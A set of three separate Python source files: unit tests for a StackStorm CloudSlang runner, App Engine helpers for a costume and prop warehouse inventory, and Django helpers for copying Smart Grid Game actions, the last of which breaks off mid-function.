    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.quote_unix')
    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    def test_run_calls_a_new_process_failure(self, mock_run_command, mock_quote_unix):
        """A non-zero subprocess exit code maps to LIVEACTION_STATUS_FAILED."""
        timeout = 1
        runner = csr.get_runner()
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: None,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        mock_run_command.return_value = (1, "", "", False)
        mock_quote_unix.return_value = ""
        result = runner.run({})
        mock_quote_unix.assert_called_with(tests_config.CONF.cloudslang.home_dir)
        self.assertTrue(mock_run_command.called)
        self.assertEqual(LIVEACTION_STATUS_FAILED, result[0])

    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    def test_run_calls_a_new_process_timeout(self, mock_run_command):
        """A timed-out subprocess maps to LIVEACTION_STATUS_FAILED even with exit code 0."""
        entry_point = 'path'
        timeout = 1
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: None,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        # Last tuple element True signals the command timed out.
        mock_run_command.return_value = (0, "", "", True)
        result = runner.run({})
        self.assertTrue(mock_run_command.called)
        self.assertEqual(LIVEACTION_STATUS_FAILED, result[0])

    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.yaml.safe_dump')
    def test_inputs_are_save_to_file_properly(self, mock_yaml_dump, mock_run_command):
        """Inputs are serialized to YAML (block style) before the command runs."""
        entry_point = 'path'
        inputs = {'a': 1}
        timeout = 1
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: inputs,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        mock_run_command.return_value = (0, "", "", True)
        mock_yaml_dump.return_value = ""
        result = runner.run({})
        self.assertTrue(mock_run_command.called)
        mock_yaml_dump.assert_called_with(inputs, default_flow_style=False)
        self.assertEqual(LIVEACTION_STATUS_FAILED, result[0])

    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.os.remove')
    def test_temp_file_deletes_when_exception_occurs(self, mock_os_remove, mock_run_command):
        """The temporary inputs file is cleaned up even when run_command raises."""
        entry_point = 'path'
        inputs = {'a': 1}
        timeout = 1
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: inputs,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        mock_run_command.return_value = (0, "", "", True)
        mock_run_command.side_effect = IOError('Boom!')
        # NOTE(review): assertRaisesRegex requires a sufficiently new
        # unittest2/Python; older versions only have assertRaisesRegexp.
        with self.assertRaisesRegex(IOError, "Boom!"):
            runner.run({})
        self.assertTrue(mock_os_remove.called)
        # os.remove was mocked, so really remove the temp file now.
        os.remove(mock_os_remove.call_args[0][0])

    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    def test_inputs_provided_via_inputs_runner_parameter(self, mock_run_command):
        """Runner-parameter inputs take precedence and are written to the temp file."""
        entry_point = 'path'
        inputs = {'a': 1}
        timeout = 1
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: inputs,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner._write_inputs_to_a_temp_file = mock.Mock()
        runner._write_inputs_to_a_temp_file.return_value = None
        mock_run_command.return_value = (0, "", "", False)
        runner.pre_run()
        runner.run({})
        runner._write_inputs_to_a_temp_file.assert_called_with(inputs=inputs)

    @mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
    def test_inputs_provided_via_action_parameters(self, mock_run_command):
        """With no runner-parameter inputs, the action parameters are used instead."""
        entry_point = 'path'
        inputs = None
        timeout = 1
        action_parameters = {'foo': 'bar'}
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: inputs,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner._write_inputs_to_a_temp_file = mock.Mock()
        runner._write_inputs_to_a_temp_file.return_value = None
        mock_run_command.return_value = (0, "", "", False)
        runner.pre_run()
        runner.run(action_parameters)
        runner._write_inputs_to_a_temp_file.assert_called_with(inputs=action_parameters)

    def test_prepare_command(self):
        """_prepare_command builds the cslang CLI string, with/without an inputs file."""
        entry_point = 'flow_path'
        inputs = None
        timeout = 1
        runner = csr.get_runner()
        runner.entry_point = entry_point
        runner.runner_parameters = {
            csr.RUNNER_INPUTS: inputs,
            csr.RUNNER_TIMEOUT: timeout,
        }
        runner.pre_run()
        # No inputs
        result = runner._prepare_command(has_inputs=False, inputs_file_path=None)
        expected = '/opt/cslang/bin/cslang run --f flow_path --cp /opt/cslang'
        self.assertEqual(result, expected)
        # Inputs
        result = runner._prepare_command(has_inputs=True, inputs_file_path='inputs_file')
        expected = '/opt/cslang/bin/cslang run --f flow_path --cp /opt/cslang --if inputs_file'
        self.assertEqual(result, expected)
|
|
# Copyright (c) 2017 Future Gadget Laboratories.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# +-------------------------+
# | Python built-in imports |
# +-------------------------+
import os
import requests
import logging
from hashlib import sha1
import base64
# +---------------------+
# | Third party imports |
# +---------------------+
from google.appengine.ext import ndb
from google.appengine.api import app_identity
from google.appengine.api import images
from google.appengine.ext import blobstore
import cloudstorage as gcs
# +---------------------+
# | First party imports |
# +---------------------+
from warehouse_models import Item, cloneItem, List
# +-----------------+
# | Item Exceptions |
# +-----------------+
class ItemDeletedException(Exception):
    '''Raised when trying to submit an edit to a deleted (but not yet purged) item.'''
    # The explicit __init__ that merely forwarded to Exception.__init__ was
    # redundant boilerplate (and forwarding **kwargs would have raised a
    # TypeError anyway, since Exception accepts positional args only);
    # inheriting the default constructor is equivalent for all valid calls.
    pass
class ItemPurgedException(Exception):
    '''Raised when trying to submit an edit to an item that has been permanently deleted.'''
    # The explicit __init__ that merely forwarded to Exception.__init__ was
    # redundant boilerplate (and forwarding **kwargs would have raised a
    # TypeError anyway, since Exception accepts positional args only);
    # inheriting the default constructor is equivalent for all valid calls.
    pass
# +-----------------------+
# | Transactional helpers |
# +-----------------------+
@ndb.transactional(xg=True, retries=1)
def commitDelete(item_key, user):
    """Marks an item as deleted, or merely suggests deletion for standard users.

    Runs inside an ndb cross-group transaction so the read-check-write
    sequence cannot interleave with other edits.
    """
    item = item_key.get()
    # Refuse to act on a stale version of the item.
    # NOTE(review): OutdatedEditException is expected to be defined elsewhere
    # in this module -- confirm.
    if item.outdated:
        raise OutdatedEditException()
    if user.permissions == "Standard user":
        # Standard users can only suggest deletion; someone with higher
        # permissions must confirm it.
        item.marked_for_deletion = True
    else:
        item.deleted = True
    item.suggested_by = user.name
    item.put()
@ndb.transactional(xg=True, retries=1)
def commitUnDelete(item_key):
    """Clears both the deleted and suggested-deletion flags on an item.

    Runs inside an ndb transaction so the flags change atomically.
    """
    item = item_key.get()
    item.deleted = False
    item.marked_for_deletion = False
    item.suggested_by = ""
    item.put()
@ndb.transactional(xg=True, retries=1)
def commitPurge(item_key):
    """Permanently deletes an item, its suggested edits and all its ancestors.

    Runs inside an ndb transaction so the whole version chain disappears
    atomically.
    """
    # Start with the item itself and any pending suggested edits.
    toDelete = [item_key] + [suggestion for suggestion in item_key.get().suggested_edits]
    # Walk up the version (parent) chain collecting every ancestor key.
    while item_key.parent():
        item_key = item_key.parent()
        toDelete.append(item_key)
    for k in toDelete:
        k.delete()
@ndb.transactional(xg=True, retries=1)
def commitEdit(old_key, new_item, suggestion=False):
    '''Stores the new item and ensures that the
    parent-child relationship is enforced between the
    old item and the new item.

    TRANSACTIONAL: This is transactional so all edits to the database
    cannot be left in an unexpected state.

    SIDE EFFECT: Sets the parent of the new_item to be the old_key.

    Args:
        old_key: The key of the item that this is an edit to.
        new_item: The new version of the item to be commited.
        suggestion: When True, record the edit only as a suggested edit;
            the old item is not marked outdated.

    Returns:
        The key of the item that was commited. This may not be new_item's
        original key since the item is cloned to re-parent it.

    Raises:
        ItemPurgedException: the target item was permanently deleted.
        ItemDeletedException: the target item is deleted (but not purged).
    '''
    old_item = old_key.get()
    # Check if item was purged (permanently deleted).
    if old_item is None:
        raise ItemPurgedException()
    # Find the newest version by walking down the child chain.
    if old_item.outdated:
        while old_item.outdated:
            old_item = old_item.child.get()
    # Re-parent the new item under the newest version.
    new_item = cloneItem(new_item, parentKey=old_item.key)
    # Check if deleted but not purged.
    if old_item.deleted:
        raise ItemDeletedException()
    # A direct edit supersedes the old version; a suggestion does not.
    old_item.outdated = not suggestion
    new_key = new_item.put()
    if suggestion:
        old_item.suggested_edits.append(new_key)
    else:
        old_item.child = new_key
    old_item.put()
    return new_item.key
@ndb.transactional(xg=True, retries=3)
def removeFromList(list_key, item_key):
    """Removes the list entry whose item shares item_key's qr_code.

    Matching is done by qr_code rather than by key so that any version of
    the item is removed.
    NOTE(review): raises IndexError if no entry matches -- confirm callers
    always check membership first.
    """
    l = list_key.get()
    item = item_key.get();
    l.items.remove([i for i in l.items if i.get().qr_code == item.qr_code][0])
    l.put()
@ndb.transactional(retries=3)
def addToList(list_key, item_key):
    """Appends item_key to the List entity and saves it (transactionally)."""
    l = list_key.get()
    l.items.append(item_key)
    l.put()
def removeFromAllLists(item_key):
    """Removes the given item key from every List that currently contains it.

    NOTE: This still allows for a race if someone adds to a list after this
    point in the function. This is okay since it will only lead to the
    number of items being off and is not worth creating a huge transaction
    for every time.
    """
    for current_list in List.query().fetch():
        if item_key not in current_list.items:
            continue
        removeFromList(current_list.key, item_key)
# +-----------------------+
# | Miscellaneous Helpers |
# +-----------------------+
def getImageHash(image_data):
    """Returns the hex SHA-1 digest of the raw image bytes."""
    return sha1(image_data).hexdigest()
def saveImageInGCS(image_data):
    """Decodes base64 image data, stores it as a PNG in Google Cloud Storage
    and returns a permanent serving URL for the stored image.

    The object name is derived from the SHA-1 of the decoded bytes, so
    identical images map to the same GCS object.
    """
    # ======================
    # Save file in GCS
    # ======================
    image_data = base64.b64decode(image_data)
    bucket_name = os.environ.get('BUCKET_NAME',
                                 app_identity.get_default_gcs_bucket_name())
    bucket = '/' + bucket_name
    filename = bucket + '/' + getImageHash(image_data) + '.png'
    write_retry_params = gcs.RetryParams(backoff_factor=1.1)
    gcs_file = gcs.open(filename,
                        'w',
                        content_type='image/png',
                        options={'x-goog-meta-foo': 'foo',
                                 'x-goog-meta-bar': 'bar'},
                        retry_params=write_retry_params)
    gcs_file.write(image_data)
    gcs_file.close()
    # Expose the GCS object through the blobstore/images APIs to obtain a
    # serving URL.
    gcs_object_name = '/gs' + filename
    blob_key = blobstore.create_gs_key(gcs_object_name)
    image_url = images.get_serving_url(blob_key)
    return image_url
    # ======================
    # End saving file to GCS
    # ======================
# Validates an html string using the w3 validator.
def validateHTML(html_string):
    """Validates html_string against the W3 'nu' validator service.

    Currently a NO-OP: the early return below intentionally disables
    validation because the W3 html validator is broken/unavailable. On
    errors the full implementation appends an alert <script> to the page
    and logs each validator message.
    """
    # TODO disable when deployed
    # TODO: Currently, the w3 html validator is broken. Remove when the site is up and running again
    return html_string
    # NOTE: everything below is intentionally unreachable until the early
    # return above is removed.
    response = requests.post("https://validator.w3.org/nu/?out=json",
                             data=html_string,
                             headers={'Content-Type': 'text/html; charset=utf-8'})
    messages = response.json()['messages']
    if messages:
        for m in messages:
            if m['type'] == 'error':
                messsage_for_human = u'Invalid HTML: {issue}\n{snippet} on line:{line}'.format(issue=m['message'], snippet=m['extract'], line=m['lastLine'])
                logging.error(messsage_for_human)
            else:
                messsage_for_human = u'Validator message: ' + str(m)
                logging.warning(messsage_for_human)
        return html_string + '<script>alert("{n} HTML errors found, check the logs for details");</script>'.format(n=len(messages))
    return html_string
# Finds the most recent version of an item.
def findUpdatedItem(item_key):
    """Returns the most recent live version of the item behind item_key.

    First walks UP the ancestor chain until an existing entity is found
    (handles rollbacks), then walks DOWN the child chain to the newest
    version. Returns None when the item (and all its ancestors) has been
    deleted or purged.
    """
    updated = item_key.get()
    updated_key = item_key
    # Ensure item exists; if not, find an ancestor that does.
    while updated is None and updated_key.parent():
        # BUG FIX: advance from the *current* key. The old code re-read
        # item_key.parent() every iteration, so the walk never progressed
        # past the first parent and could loop forever.
        updated_key = updated_key.parent()
        updated = updated_key.get()
    # If no ancestor exists the item has been deleted/purged.
    # TODO test this case where item is deleted/purged
    if updated is None or updated_key is None:
        return None
    # We have a valid item; follow the child chain to the newest version.
    while updated.outdated:
        updated = updated.child.get()
    if updated.deleted:
        return None
    return updated
# Converts text list of tags to array of tags
def parseTags(tags_string):
    """Converts a newline-separated block of tag text into a list of
    lower-cased tags.

    BUG FIX: the previous index arithmetic (slicing to tag_end_index - 1)
    assumed CRLF ("\r\n") line endings and silently chopped the last
    character of every tag when lines ended with a bare "\n". Splitting on
    "\n" and stripping any trailing "\r" handles both conventions.
    """
    tags_list = [line.rstrip('\r').lower() for line in tags_string.split('\n')]
    # A trailing newline yields one empty final entry; drop it to keep the
    # previous behaviour of ignoring text after the last separator.
    if tags_list and tags_list[-1] == '':
        tags_list.pop()
    return tags_list
# Filters viewable items based on selected boxes in MainPage
def filterItems(user_id, item_name, item_type, item_condition, item_colors,
                item_color_grouping, costume_article, costume_size_string,
                min_size_num, max_size_num, exclude_unknown_size, tags_filter, tag_grouping,
                availability_filter, outdated=False):
    """Builds and runs an Item query from the MainPage filter selections.

    Grouping parameters ('inclusive' vs anything else) choose between
    OR-style (IN) and AND-style (stacked equality filters) matching for
    tags and colors. Name matching is done in Python after the datastore
    query since ndb has no substring filter.
    """
    query = Item.query()
    query = query.filter(Item.outdated == outdated)
    # -------------------------
    # Case by case search
    # -------------------------
    # Tags
    tags_list = parseTags(tags_filter)
    if len(tags_list) != 0:
        if tag_grouping == "inclusive":
            # Any of the tags may match.
            query = query.filter(Item.tags.IN(tags_list))
        else:
            # All tags must match.
            for tag in tags_list:
                query = query.filter(Item.tags == tag)
    if availability_filter == 'checkedOutYou':
        query = query.filter(Item.checked_out_by == user_id)
    # Costume article type
    # NOTE(review): indentation was lost in this copy; the size/article
    # filters are assumed to apply only to costume searches -- confirm.
    if item_type == "Costume":
        query = query.order(Item.clothing_size_num)
        # Size within [min, max], or -1 meaning "size unknown".
        query = query.filter(ndb.OR(ndb.AND(Item.clothing_size_num >= int(min_size_num), Item.clothing_size_num <= int(max_size_num)), Item.clothing_size_num == -1))
        if exclude_unknown_size:
            query = query.filter(Item.clothing_size_num != -1)
        if (costume_article):
            query = query.filter(Item.clothing_article_type == costume_article)
        if (costume_size_string):
            query = query.filter(Item.clothing_size_string == costume_size_string)
    # # -------------------------
    # # Always explicitly search
    # # -------------------------
    # Item type
    if item_type == "All":
        query = query.filter(Item.item_type.IN(["Costume", "Prop"]))
    elif item_type:
        query = query.filter(Item.item_type == item_type)
    # Item Condition (empty selection means "any condition")
    if (len(item_condition) == 0):
        item_condition = ["Good", "Fair", "Poor", "Being repaired" ]
    query = query.filter(Item.condition.IN(item_condition))
    # Colors
    if len(item_colors) != 0:
        if item_color_grouping == "inclusive":
            query = query.filter(Item.item_color.IN(item_colors))
        else:
            for color in item_colors:
                query = query.filter(Item.item_color == color)
    # Availability
    if availability_filter == 'All':
        query = query.filter(Item.checked_out.IN([True, False]))
    elif availability_filter == 'checkedIn':
        query = query.filter(Item.checked_out == False)
    elif availability_filter:
        query = query.filter(Item.checked_out == True)
    results = query.order(Item.updated).fetch()
    # Name: case-insensitive substring match, applied post-query.
    if item_name != '':
        results = [x for x in results if x.name.lower().find(item_name.lower()) >= 0]
    return results
# TODO: actually remove rolled back and deleted items
def updateList(l):
    """Replaces stale item keys in list l with their newest versions.

    Keys whose items were deleted/purged are dropped; keys with a newer
    version are swapped for the new key. The list is saved only when
    something changed.
    """
    to_add = []
    to_remove = []
    for item_key in l.items:
        updated = findUpdatedItem(item_key)
        logging.info('Updated key:%s Item key:%s', updated.key if updated else None, item_key)
        if updated is None:
            # Item no longer exists (deleted or purged) - drop it.
            to_remove.append(item_key)
        elif updated.key != item_key:
            # A newer version exists - swap the stale key for the new one.
            to_add.append(updated.key)
            to_remove.append(item_key)
    # FIX: list comprehension instead of filter(); on Python 3 filter()
    # returns a lazy iterator which would break the extend() below.
    # Behaviour is identical on Python 2.
    l.items = [k for k in l.items if k not in to_remove]
    l.items.extend(to_add)
    if to_add or to_remove:
        l.put()
|
|
'''Helper functions for the Smart Grid Game Library and grid instance.
Created on Mar 15, 2013
@author: Carleton Moore
'''
from django.db.models.deletion import Collector
from django.db.models.fields.related import ForeignKey
from apps.widgets.smartgrid.models import Action, Activity, Commitment, Event, Filler, ColumnName, \
Level, TextPromptQuestion, Grid, ColumnGrid
from django.shortcuts import get_object_or_404
from apps.widgets.smartgrid_library.models import LibraryAction, LibraryActivity, \
LibraryCommitment, LibraryEvent, LibraryColumnName, LibraryTextPromptQuestion
from django.http import Http404
from apps.widgets.smartgrid_design.models import DesignerAction, DesignerColumnName, \
DesignerActivity, DesignerCommitment, DesignerEvent, DesignerFiller, DesignerLevel,\
DesignerTextPromptQuestion, DesignerGrid, DesignerColumnGrid, Draft
import os
from django.core.management import call_command
from apps.managers.predicate_mgr import predicate_mgr
def duplicate(obj, value=None, field=None, duplicate_order=None):  # pylint: disable=R0914
    """
    Duplicate all related objects of obj setting
    field to value. If one of the duplicate
    objects has an FK to another duplicate object
    update that as well. Return the duplicate copy
    of obj.

    duplicate_order is a list of models which specify how
    the duplicate objects are saved. For complex objects
    this can matter. Check to save if objects are being
    saved correctly and if not just pass in related objects
    in the order that they should be saved.

    NOTE(review): written against the Python 2 era Django API
    (f.rel.to, reversed() over dict keys) -- confirm before running
    on Python 3 / modern Django.
    """
    # Use Django's deletion collector to gather obj plus everything that
    # depends on it, sorted into deletion order.
    collector = Collector({})
    collector.collect([obj])
    collector.sort()
    related_models = collector.data.keys()
    # Snapshot a {model: {pk: instance}} map so FKs can be re-pointed to
    # the duplicated instances later.
    data_snapshot = {}
    for key in collector.data.keys():
        data_snapshot.update({key: dict(zip([item.pk for item in collector.data[key]], \
                                            [item for item in collector.data[key]]))})
    root_obj = None
    # Sometimes it's good enough just to save in reverse deletion order.
    if duplicate_order is None:
        duplicate_order = reversed(related_models)
    for model in duplicate_order:
        # Find all FKs on model that point to a related_model.
        fks = []
        for f in model._meta.fields:
            if isinstance(f, ForeignKey) and f.rel.to in related_models:
                fks.append(f)
        # Replace each `sub_obj` with a duplicate.
        if model not in collector.data:
            continue
        sub_objects = collector.data[model]
        for obj in sub_objects:
            for fk in fks:
                fk_value = getattr(obj, "%s_id" % fk.name)
                # If this FK has been duplicated then point to the duplicate.
                fk_rel_to = data_snapshot[fk.rel.to]
                if fk_value in fk_rel_to:
                    dupe_obj = fk_rel_to[fk_value]
                    setattr(obj, fk.name, dupe_obj)
            # Duplicate the object and save it: clearing the pk makes
            # save() insert a new row.
            obj.id = None
            # Give slugs a '-copy' suffix unless the caller is explicitly
            # overriding the slug field.
            if field is None or field != 'slug':
                slug = obj.slug
                obj.slug = slug + '-copy'
            if field is not None:
                setattr(obj, field, value)
            obj.save()
            # The first object saved is the duplicate of obj itself.
            if root_obj is None:
                root_obj = obj
    return root_obj
# pylint: enable=R0914
def check_designer_vs_library(draft):
    """Checks the slugs in the designer vs the library.

    Returns the list of slugs present in the given designer draft that have
    no matching action in the Smart Grid Library.
    """
    missing = []
    for des_action in DesignerAction.objects.filter(draft=draft):
        try:
            get_library_action(des_action.slug)
        except Http404:
            missing.append(des_action.slug)
    return missing
def is_library(obj):
    """Returns True if the object is a Library instance (class name starts
    with 'Library')."""
    return type(obj).__name__.startswith('Library')
def is_designer(obj):
    """Returns True if the object is a Designer instance (class name starts
    with 'Designer')."""
    return type(obj).__name__.startswith('Designer')
def is_smartgrid(obj):
    """Returns True if the object is a SmartGrid instance, i.e. neither a
    Library nor a Designer instance."""
    return not is_library(obj) and not is_designer(obj)
def _copy_fields(orig, copy):
    """Copies every field value except the primary key from orig onto copy,
    then saves copy."""
    for fld in orig._meta.fields:
        if fld.name == 'id':
            continue
        setattr(copy, fld.name, getattr(orig, fld.name))
    copy.save()
def _copy_fields_no_foriegn_keys(orig, copy):
    """Copies the non-foreign-key field values from orig to copy.

    Unlike _copy_fields this does NOT save the copy; callers are expected
    to finish populating it and call save() themselves.
    """
    # Collect the names of all ForeignKey fields so they can be skipped.
    fks = []
    for f in orig._meta.fields:
        if isinstance(f, ForeignKey):
            fks.append(f.name)
    for f in orig._meta.fields:
        # Skip the primary key and any foreign keys.
        if f.name != 'id' and not f.name in fks:
            value = getattr(orig, f.name)
            setattr(copy, f.name, value)
def _admin_link(action):
    """Returns the hardcoded admin-edit link for the given action."""
    template = "<a href='/challenge_setting_admin/smartgrid_design/designer{0}/{1}/'>{2}</a>"
    return template.format(action.type, action.pk, action.name)
def __slug_has_copy_num(slug):
    """Returns True if the given slug has a copy number. Copy numbers are
    defined as a trailing '-<digits>' segment."""
    return slug.split('-')[-1].isdigit()
def __get_copy_num(slug):
    """Returns the trailing copy number of the slug, or -1 when there is
    none (e.g. intro-video -> -1, play-outside-cafe-1 -> 1)."""
    tail = slug.split('-')[-1]
    return int(tail) if tail.isdigit() else -1
def __get_slug_wo_copy_num(slug):
    """Returns the slug prefix (ending in '-') with any trailing copy
    number removed; slugs without a copy number get '-' appended."""
    if __slug_has_copy_num(slug):
        return slug[: slug.rfind('-') + 1]
    return "%s-" % slug
def __get_next_library_copy_slug(slug):
    """Returns the next available library copy slug: the slug prefix plus
    the smallest unused copy number."""
    num = __get_copy_num(slug)
    prefix = __get_slug_wo_copy_num(slug)
    while True:
        num += 1
        candidate = '%s%d' % (prefix, num)
        try:
            # Probe until the lookup raises Http404, i.e. the slug is free.
            get_library_action(candidate)
        except Http404:
            return candidate
def __get_next_designer_copy_slug(draft, slug):
    """Returns the next available designer copy slug for the given draft:
    the slug prefix plus the smallest unused copy number."""
    num = __get_copy_num(slug)
    prefix = __get_slug_wo_copy_num(slug)
    while True:
        num += 1
        candidate = '%s%d' % (prefix, num)
        try:
            # Probe until the lookup raises Http404, i.e. the slug is free.
            get_designer_action(draft, candidate)
        except Http404:
            return candidate
def instantiate_designer_column_from_library(draft, slug):
    """Instantiates a DesignerColumnName from the LibraryColumnName with the
    given draft and slug, overwriting an existing designer column if present."""
    lib_col = get_object_or_404(LibraryColumnName, slug=slug)
    try:
        des_col = get_object_or_404(DesignerColumnName, draft=draft, slug=slug)
    except Http404:
        # No designer copy yet - create one bound to this draft.
        des_col = DesignerColumnName()
        des_col.draft = draft
    _copy_fields(lib_col, des_col)
    return des_col
def instantiate_designer_action_from_library(draft, slug):
    """Instantiate a Smart Grid Game Design action from a Library instance.

    draft is the designer draft to use and slug identifies the library
    instance.  If a Designer instance already exists for the draft it is
    overwritten.  Returns the designer action.
    """
    lib_obj = get_library_action(slug)
    action_type = lib_obj.type
    try:
        exist_obj = get_designer_action(draft, slug)
    except Http404:
        exist_obj = None
    design_obj = None
    if exist_obj is None:  # idiom fix: identity test for None
        # Create the concrete designer subclass and re-fetch the matching
        # concrete library subclass so subclass-specific fields get copied.
        # The type values are mutually exclusive, hence the elif chain.
        if action_type == 'activity':
            design_obj = DesignerActivity()
            lib_obj = LibraryActivity.objects.get(slug=slug)
        elif action_type == 'commitment':
            design_obj = DesignerCommitment()
            lib_obj = LibraryCommitment.objects.get(slug=slug)
        elif action_type == 'event':
            design_obj = DesignerEvent()
            lib_obj = LibraryEvent.objects.get(slug=slug)
        elif action_type == 'filler':
            design_obj = DesignerFiller()
        design_obj.draft = draft
    else:  # use the existing instance.
        design_obj = exist_obj
    _copy_fields(lib_obj, design_obj)
    # Copy all the LibraryTextPromptQuestions onto the designer action,
    # reusing an existing designer question when one already matches.
    for question in LibraryTextPromptQuestion.objects.filter(libraryaction=lib_obj):
        try:
            des_obj = get_object_or_404(DesignerTextPromptQuestion, action=design_obj,
                                        question=question.question, answer=question.answer,
                                        draft=draft)
        except Http404:
            des_obj = DesignerTextPromptQuestion()
        _copy_fields_no_foriegn_keys(question, des_obj)
        des_obj.action = get_designer_action(draft, slug)
        des_obj.draft = draft
        des_obj.save()
    return design_obj
def instantiate_designer_level_from_smartgrid(draft, slug):
    """Creates or over writes a DesignerLevel for the given designer draft and level slug."""
    level = get_object_or_404(Level, slug=slug)
    # Reuse the draft's existing DesignerLevel when present, otherwise
    # create one bound to the draft before copying the fields over.
    try:
        des_level = get_object_or_404(DesignerLevel, draft=draft, slug=slug)
    except Http404:
        des_level = DesignerLevel()
        des_level.draft = draft
    _copy_fields(level, des_level)
    return des_level
def instantiate_designer_column_from_smartgrid(draft, slug):
    """Creates a DesignerColumnName from the ColumnName with the given slug."""
    col = get_object_or_404(ColumnName, slug=slug)
    des_col = None
    # Reuse the draft's existing designer column when present, otherwise
    # create one bound to the draft before copying the fields over.
    try:
        des_col = get_object_or_404(DesignerColumnName, draft=draft, slug=slug)
    except Http404:
        des_col = DesignerColumnName()
        des_col.draft = draft
    _copy_fields(col, des_col)
    return des_col
def instantiate_designer_action_from_smartgrid(draft, slug):
    """Create (or overwrite) a designer instance of the deployed Smart Grid
    action with the given slug, bound to *draft*.  Returns the designer
    action.
    """
    grid_obj = get_smartgrid_action(slug)
    action_type = grid_obj.type
    try:
        old_obj = get_designer_action(draft, slug)
    except Http404:
        old_obj = None
    designer_obj = None
    if old_obj is None:  # idiom fix: identity test for None
        # Action types are mutually exclusive, hence the elif chain.
        if action_type == 'activity':
            designer_obj = DesignerActivity()
        elif action_type == 'commitment':
            designer_obj = DesignerCommitment()
        elif action_type == 'event':
            designer_obj = DesignerEvent()
        elif action_type == 'filler':
            designer_obj = DesignerFiller()
        designer_obj.draft = draft
    else:
        designer_obj = old_obj
    _copy_fields(grid_obj, designer_obj)
    # Copy all the TextPromptQuestions onto the designer action, reusing an
    # existing designer question when one already matches.
    for question in TextPromptQuestion.objects.filter(action=grid_obj):
        try:
            des_obj = get_object_or_404(DesignerTextPromptQuestion, action=designer_obj,
                                        question=question.question, answer=question.answer,
                                        draft=draft)
        except Http404:
            des_obj = DesignerTextPromptQuestion()
        _copy_fields_no_foriegn_keys(question, des_obj)
        des_obj.action = get_designer_action(draft, slug)
        des_obj.draft = draft
        des_obj.save()
    return designer_obj
def instantiate_smartgrid_level_from_designer(des_level):
    """Creates a Smart Grid Level from the DesignerLevel."""
    level = None
    # Update the deployed Level with the same slug when it exists,
    # otherwise create a new one.
    try:
        level = get_smartgrid_level(des_level.slug)
    except Http404:
        level = Level()
    _copy_fields(des_level, level)
    return level
def instantiate_smartgrid_column_from_designer(des_col):
    """Creates a Smart Grid ColumnName from the DesignerColumnName."""
    col = None
    # Update the deployed ColumnName with the same slug when it exists,
    # otherwise create a new one.
    try:
        col = get_smartgrid_column_name(des_col.slug)
    except Http404:
        col = ColumnName()
    _copy_fields(des_col, col)
    return col
def instantiate_smartgrid_action_from_designer(draft, slug):
    """Create (or update) the deployed Smart Grid action from the designer
    instance with the given draft and slug.  Saves and returns the grid
    action.
    """
    des_action = get_designer_action(draft, slug)
    action_type = des_action.type
    try:
        old_obj = get_smartgrid_action(slug)
    except Http404:
        old_obj = None
    grid_action = None
    if old_obj is None:  # idiom fix: identity test for None
        # Action types are mutually exclusive, hence the elif chain.
        if action_type == 'activity':
            grid_action = Activity()
        elif action_type == 'commitment':
            grid_action = Commitment()
        elif action_type == 'event':
            grid_action = Event()
        elif action_type == 'filler':
            grid_action = Filler()
    else:
        grid_action = old_obj
    _copy_fields_no_foriegn_keys(des_action, grid_action)
    grid_action.save()
    # Copy the designer's text prompt questions, skipping ones that already
    # exist verbatim on the grid action.
    for question in DesignerTextPromptQuestion.objects.filter(draft=draft, action=des_action):
        old_ques = TextPromptQuestion.objects.filter(action=grid_action,
                                                     question=question.question,
                                                     answer=question.answer)
        if len(old_ques) == 0:
            tqp = TextPromptQuestion(action=grid_action, question=question.question,
                                     answer=question.answer)
            tqp.save()
    return grid_action
def copy_library_action(slug):
    """Copies the LibraryAction with the given slug."""
    action = get_library_action(slug)
    action_type = action.type
    # NOTE(review): no 'filler' branch -- if a LibraryAction could have type
    # 'filler' this would raise NameError ('obj' unbound).  get_library_action
    # only dispatches activity/commitment/event, so presumably fillers never
    # live in the library; confirm before relying on it.
    if action_type == 'activity':
        obj = LibraryActivity()
    elif action_type == 'commitment':
        obj = LibraryCommitment()
    elif action_type == 'event':
        obj = LibraryEvent()
    _copy_fields(action, obj)
    copy_slug = __get_next_library_copy_slug(slug)
    obj.slug = copy_slug
